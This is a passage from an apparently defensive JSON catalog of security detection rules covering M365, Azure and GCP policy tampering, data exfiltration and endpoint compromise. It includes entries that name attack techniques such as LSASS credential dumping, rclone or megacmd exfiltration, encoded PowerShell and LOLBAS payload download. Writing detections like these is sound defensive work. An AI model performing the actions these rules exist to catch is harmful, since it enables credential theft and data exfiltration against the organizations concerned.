"det-cloud-198", "type": "detection", "name": "M365 Teams External Access Domain Allow-Listed", "description": "Detects modification of the Teams external access policy to allow federation with a new domain. Threat actors social-engineer admins or use compromised accounts to open federation for phishing or data exfiltration via Teams chat.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1199" ], "log_source": "m365", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-teams-external-access-domain-added.yaml" }, { "id": "det-cloud-199", "type": "detection", "name": "M365 Teams Custom App Sideloading Enabled", "description": "The Teams app permission policy was changed to allow sideloading of custom apps. Malicious Teams apps can harvest tokens, exfiltrate chat data, and impersonate users.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1195.002" ], "log_source": "m365", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-teams-app-sideloading-enabled.yaml" }, { "id": "det-cloud-200", "type": "detection", "name": "M365 Defender Safe Attachments Policy Disabled", "description": "A Safe Attachments policy was disabled or its action set to Allow. Disabling detonation-based attachment scanning exposes the org to weaponized document delivery.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "m365", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-defender-safe-attachments-policy-disabled.yaml" }, { "id": "det-cloud-201", "type": "detection", "name": "M365 Defender Safe Links Policy Disabled", "description": "A Safe Links policy was disabled or URL scanning turned off. This removes time-of-click URL protection and allows deferred phishing links to reach users unchecked.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "m365", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-defender-safe-links-policy-disabled.yaml" }, { "id": "det-cloud-202", "type": "detection", "name": "M365 Defender Anti-Phishing Policy Weakened", "description": "An anti-phishing policy had impersonation protection or spoof intelligence disabled. This lowers the barrier for BEC and brand-impersonation phishing campaigns.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1562.001", "T1566.002" ], "log_source": "m365", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-defender-antiphish-policy-weakened.yaml" }, { "id": "det-cloud-203", "type": "detection", "name": "M365 Purview DLP Policy Disabled", "description": "A Data Loss Prevention policy was disabled in Microsoft Purview. Disabling DLP removes the guardrails that prevent sensitive data from leaving the tenant via email, Teams, or SharePoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.001", "T1537" ], "log_source": "m365", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-purview-dlp-policy-disabled.yaml" }, { "id": "det-cloud-204", "type": "detection", "name": "M365 Purview Sensitivity Label Removed From Document", "description": "A sensitivity label was downgraded or removed from a document in SharePoint or OneDrive. This may indicate an attempt to bypass DLP controls before exfiltrating classified content.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1565.001", "T1537" ], "log_source": "m365", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-purview-sensitivity-label-removed.yaml" }, { "id": "det-cloud-205", "type": "detection", "name": "M365 Purview Retention Policy Deleted", "description": "A retention or preservation policy was deleted. Removing retention enables permanent deletion of email and documents that may be relevant to legal holds or incident investigations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1485", "T1070" ], "log_source": "m365", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-purview-retention-policy-deleted.yaml" }, { "id": "det-cloud-206", "type": "detection", "name": "M365 Power Platform DLP Connector Policy Modified", "description": "A Power Platform data policy was modified to reclassify or unblock connectors. Moving connectors out of the blocked group allows low-code flows to exfiltrate data via HTTP, Dropbox, or other external services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1562.001", "T1537" ], "log_source": "m365", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-power-platform-dlp-policy-modified.yaml" }, { "id": "det-cloud-207", "type": "detection", "name": "M365 Power Automate Flow Shared With External User", "description": "A Power Automate flow was shared with an external (guest) user. External users with flow access can trigger automations that read mailboxes, access SharePoint, or call Graph API on behalf of internal identities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1078.004", "T1199" ], "log_source": "m365", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-power-automate-flow-shared-externally.yaml" }, { "id": "det-cloud-208", "type": "detection", "name": "M365 Entra ID Conditional Access Policy Disabled", "description": "A Conditional Access policy was set to report-only or disabled. Disabling CA policies removes MFA enforcement, device compliance checks, or location-based access controls for the tenant.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.001", "T1556" ], "log_source": "m365", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-entra-conditional-access-policy-disabled.yaml" }, { "id": "det-cloud-209", "type": "detection", "name": "M365 Entra PIM Global Admin Role Activated", "description": "A user activated the Global Administrator role via Privileged Identity Management. While PIM is a legitimate workflow, Global Admin activation should be rare and audited since it grants unrestricted tenant access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004", "T1098.003" ], "log_source": "m365", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-entra-pim-role-activated-global-admin.yaml" }, { "id": "det-cloud-210", "type": "detection", "name": "M365 Entra Cross-Tenant Access Policy Changed", "description": "An inbound or outbound cross-tenant access policy was created or modified. Misconfigured policies can allow external tenants to access internal resources or bypass B2B trust boundaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1199", "T1078.004" ], "log_source": "m365", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-entra-cross-tenant-access-policy-changed.yaml" }, { "id": "det-cloud-211", "type": "detection", "name": "M365 OAuth App Accessing Mailbox via Graph API", "description": "An OAuth application accessed a mailbox through Microsoft Graph with application-level (not delegated) permissions. Compromised OAuth apps with Mail.Read or Mail.ReadWrite can silently exfiltrate email at scale.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1114.002", "T1528" ], "log_source": "m365", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-exchange-oauth-app-mailbox-access.yaml" }, { "id": "det-cloud-212", "type": "detection", "name": "Azure Key Vault Purge Protection Disabled", "description": "Purge protection was disabled on an Azure Key Vault. Without purge protection, soft-deleted secrets, keys, and certificates can be permanently destroyed before the retention period expires, enabling evidence destruction.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1485", "T1070" ], "log_source": "azure", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-key-vault-purge-protection-disabled.yaml" }, { "id": "det-cloud-213", "type": "detection", "name": "Azure Elevated Access to Manage All Subscriptions", "description": "A Global Admin activated elevated access at the management group root, granting User Access Administrator over every Azure subscription in the tenant. This is the single most powerful escalation in Azure and should be extremely rare.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004", "T1098.003" ], "log_source": "azure", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-management-group-elevated-access.yaml" }, { "id": "det-cloud-214", "type": "detection", "name": "Azure Defender for Cloud Plan Disabled", "description": "A Microsoft Defender for Cloud plan (Servers, Storage, SQL, etc.) was set to Free tier, removing threat detection and advanced security for that resource type across the subscription.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-defender-for-cloud-plan-disabled.yaml" }, { "id": "det-cloud-215", "type": "detection", "name": "GCP Organization Policy Constraint Removed", "description": "An organization policy constraint was deleted or reset to default. Removing constraints like domain-restricted sharing or uniform bucket-level access weakens tenant-wide security guardrails.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-org-policy-constraint-removed.yaml" }, { "id": "det-cloud-216", "type": "detection", "name": "GCP VPC Firewall Rule Allows All Ingress", "description": "A firewall rule was created or updated to allow ingress from 0.0.0.0/0 on all ports or a wide port range. This exposes compute instances to the public internet without restriction.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.007" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-vpc-firewall-rule-allow-all-ingress.yaml" }, { "id": "det-cloud-217", "type": "detection", "name": "GCP Cloud Armor Security Policy Removed", "description": "A Cloud Armor security policy was deleted from a backend service. This removes WAF rules, DDoS protection, and geo-blocking controls from the exposed endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-cloud-armor-policy-removed.yaml" }, { "id": "det-cloud-218", "type": "detection", "name": "GCP Audit Log Sink Deleted", "description": "A Cloud Logging sink was deleted. Sinks route audit logs to BigQuery, Cloud Storage, or SIEM destinations. Deleting a sink creates a blind spot in the security monitoring pipeline.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.008" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-audit-log-sink-deleted.yaml" }, { "id": "det-cloud-219", "type": "detection", "name": "M365 eDiscovery Compliance Search Created", "description": "Detects creation of an eDiscovery compliance search in Microsoft Purview. Insider threats and compromised admin accounts abuse eDiscovery to search and export mailbox contents at scale.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1114.002", "T1213" ], "log_source": "m365", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-exchange-ediscovery-search-created.yaml" }, { "id": "det-cloud-220", "type": "detection", "name": "M365 Exchange Inbound Connector From Untrusted Domain", "description": "Detects creation of an Exchange Online inbound connector that accepts mail from a specific external sender domain. Adversaries create connectors to bypass spam filters for phishing infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1566" ], "log_source": "m365", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-exchange-mail-connector-external-domain.yaml" }, { "id": "det-cloud-221", "type": "detection", "name": "M365 Exchange Transport Rule Redirects Mail Externally", "description": "A transport rule was created or modified to redirect or BCC mail to an external domain. Attackers use this for persistent email exfiltration that survives password resets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1114.003", "T1020" ], "log_source": "m365", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-exchange-transport-rule-redirect-external.yaml" }, { "id": "det-cloud-222", "type": "detection", "name": "M365 SharePoint External Sharing Enabled Tenant-Wide", "description": "Detects tenant-level SharePoint sharing policy changed to allow external or anonymous sharing. Widens the data-loss attack surface across all sites.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1567", "T1537" ], "log_source": "m365", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-sharepoint-external-sharing-enabled-tenant.yaml" }, { "id": "det-cloud-223", "type": "detection", "name": "M365 SharePoint Site Collection Admin Added", "description": "A new site collection administrator was added. Site collection admins bypass item-level permissions and can access all content including OneDrive for Business sites.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1098.003" ], "log_source": "m365", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-sharepoint-site-collection-admin-added.yaml" }, { "id": "det-cloud-224", "type": "detection", "name": "M365 Teams External Access Policy Enabled", "description": "Teams external access was changed to allow federation with all external domains or specific unblocked domains. Attackers leverage external access to phish internal users via Teams chat.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1566.003" ], "log_source": "m365", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-teams-external-access-enabled.yaml" }, { "id": "det-cloud-225", "type": "detection", "name": "M365 Unified Audit Log Disabled", "description": "Detects disabling of the Microsoft 365 unified audit log. Attackers disable auditing early in a compromise to erase their trail across Exchange, SharePoint, Teams, and Entra ID.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1562.008" ], "log_source": "m365", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-unified-audit-log-disabled.yaml" }, { "id": "det-data-exfil-001", "type": "detection", "name": "Large Outbound Transfer to Personal Cloud Storage", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Large Outbound Transfer to Personal Cloud Storage'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1567.002" ], "log_source": "proxy", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/large-egress-personal-cloud.yaml" }, { "id": "det-data-exfil-002", "type": "detection", "name": "Outbound Bytes Spike Above Baseline (Anomaly)", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Outbound Bytes Spike Above Baseline (Anomaly)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1041" ], "log_source": "ndr", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/egress-spike-baseline.yaml" }, { "id": "det-data-exfil-003", "type": "detection", "name": "rclone or megacmd Process Spawned on Host", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'rclone or megacmd Process Spawned on Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1567.002" ], "log_source": "edr", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/rclone-process-on-host.yaml" }, { "id": "det-data-exfil-004", "type": "detection", "name": "Archive Tool Then Large Egress Within 15 Minutes", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Archive Tool Then Large Egress Within 15 Minutes'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1560.001", "T1041" ], "log_source": "edr", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/archive-then-egress.yaml" }, { "id": "det-data-exfil-005", "type": "detection", "name": "SaaS File Shared to External Domain", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'SaaS File Shared to External Domain'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "data-exfil", "mitre_techniques": [ "T1567" ], "log_source": "google-workspace", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/data-share-external-domain.yaml" }, { "id": "det-data-exfil-006", "type": "detection", "name": "Salesforce Bulk Data Export by Non-Allowlisted User", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Salesforce Bulk Data Export by Non-Allowlisted User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1530" ], "log_source": "salesforce", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/salesforce-bulk-export.yaml" }, { "id": "det-data-exfil-007", "type": "detection", "name": "Snowflake Large Result-Set Download by Non-Service Account", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Snowflake Large Result-Set Download by Non-Service Account'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1530" ], "log_source": "snowflake", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/snowflake-mass-export.yaml" }, { "id": "det-data-exfil-008", "type": "detection", "name": "Database Application Reads Anomalously High Row Count", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Database Application Reads Anomalously High Row Count'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "data-exfil", "mitre_techniques": [ "T1530" ], "log_source": "db", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/db-mass-row-read.yaml" }, { "id": "det-data-exfil-009", "type": "detection", "name": "Bulk Download Outside Business Hours", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Bulk Download Outside Business Hours'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "data-exfil", "mitre_techniques": [ "T1041" ], "log_source": "proxy", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/off-hours-bulk-download.yaml" }, { "id": "det-data-exfil-010", "type": "detection", "name": "Git Push Containing PII or Secret Pattern", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Git Push Containing PII or Secret Pattern'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1552.001" ], "log_source": "github", "playbook": "tpl-secret-leak", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/github-pii-pattern-push.yaml" }, { "id": "det-data-exfil-011", "type": "detection", "name": "Outbound Paste to Public Pastebin / Gist", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Outbound Paste to Public Pastebin / Gist'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "data-exfil", "mitre_techniques": [ "T1567" ], "log_source": "proxy", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/outbound-paste-public.yaml" }, { "id": "det-data-exfil-012", "type": "detection", "name": "Encrypted Archive Attachment Sent Externally", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Encrypted Archive Attachment Sent Externally'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "data-exfil", "mitre_techniques": [ "T1560.001", "T1567" ], "log_source": "email", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/encrypted-archive-attachment.yaml" }, { "id": "det-data-exfil-013", "type": "detection", "name": "Mass Print Job From Confidential Document Repository", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Mass Print Job From Confidential Document Repository'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "data-exfil", "mitre_techniques": [ "T1052" ], "log_source": "windows", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/printer-mass-print-confidential.yaml" }, { "id": "det-data-exfil-014", "type": "detection", "name": "Bulk Zip Creation on File Server", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Bulk Zip Creation on File Server'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "data-exfil", "mitre_techniques": [ "T1560.001" ], "log_source": "edr", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/bulk-zip-on-fileserver.yaml" }, { "id": "det-data-exfil-015", "type": "detection", "name": "Bulk Mailbox Export From M365 Compliance Center", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Bulk Mailbox Export From M365 Compliance Center'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1114.002" ], "log_source": "azure", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/bulk-msg-export-mail.yaml" }, { "id": "det-data-exfil-016", "type": "detection", "name": "Inbox Rule Forwarding to External Address", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Inbox Rule Forwarding to External Address'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1114.003" ], "log_source": "azure", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/exchange-mail-forward-external.yaml" }, { "id": "det-data-exfil-017", "type": "detection", "name": "Backup Export to Non-Allowlisted Destination", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Backup Export to Non-Allowlisted Destination'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1567" ], "log_source": "cloud", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/backup-export-anomalous.yaml" }, { "id": "det-data-exfil-018", "type": "detection", "name": "Container Image Mass Export to External Registry", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Container Image Mass Export to External Registry'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1567" ], "log_source": "cloud", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/container-mass-image-export.yaml" }, { "id": "det-data-exfil-019", "type": "detection", "name": "VPN Tunnel Large Download from Foreign Country", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'VPN Tunnel Large Download from Foreign Country'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "data-exfil", "mitre_techniques": [ "T1041" ], "log_source": "vpn", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/vpn-large-download-foreign.yaml" }, { "id": "det-data-exfil-020", "type": "detection", "name": "Secrets Manager Bulk Fetch by Human Principal", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Secrets Manager Bulk Fetch by Human Principal'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1555", "T1530" ], "log_source": "cloud", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/secrets-mass-fetch.yaml" }, { "id": "det-endpoint-001", "type": "detection", "name": "LOLBAS Binary Used for Download or Execution", "description": "Detects living-off-the-land binaries (LOLBAS) being used to download payloads or execute remote code. These binaries are commonly abused by attackers because they are signed by Microsoft and bypass simple application whitelisting.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1218" ], "log_source": "edr", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/lolbas-execution.yaml" }, { "id": "det-endpoint-002", "type": "detection", "name": "LSASS Memory Read by Untrusted Process", "description": "Detects when a process reads LSASS memory with access masks consistent with credential extraction (Mimikatz-style). LSASS holds plaintext password hashes and Kerberos tickets in memory; access from anything other than allowlisted security software is a strong compromise indicator.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1003.001" ], "log_source": "edr", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/credential-dumping-lsass.yaml" }, { "id": "det-endpoint-003", "type": "detection", "name": "Mass File Extension Rename Indicative of Ransomware", "description": "Detects bulk file rename operations where file extensions are changed to novel patterns within a short time window. This is a high-fidelity indicator of ransomware encryption activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1486" ], "log_source": "edr", "playbook": "tpl-ransomware", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/ransomware-file-extension-change.yaml" }, { "id": "det-endpoint-004", "type": "detection", "name": "Office Application Spawns Shell or Scripting Engine", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Office Application Spawns Shell or Scripting Engine'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1059", "T1204.002" ], "log_source": "edr", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/office-spawn-shell.yaml" }, { "id": "det-endpoint-005", "type": "detection", "name": "PowerShell with Encoded Command and Bypass Flag", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'PowerShell with Encoded Command and Bypass Flag'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1059.001", "T1027" ], "log_source": "edr", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/powershell-encoded-command.yaml" }, { "id": "det-endpoint-006", "type": "detection", "name": "Process Created via WMI by Non-Admin Tool", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Process Created via WMI by Non-Admin Tool'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1047" ], "log_source": "edr", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/wmi-process-creation.yaml" }, { "id": "det-endpoint-007", "type": "detection", "name": "Scheduled Task Created Pointing to Suspicious Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Scheduled Task Created Pointing to Suspicious Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1053.005" ], "log_source": "edr", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/scheduled-task-create-suspicious.yaml" }, { "id": "det-endpoint-008", "type": "detection", "name": "Persistence via Registry Run Key Write", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Persistence via Registry 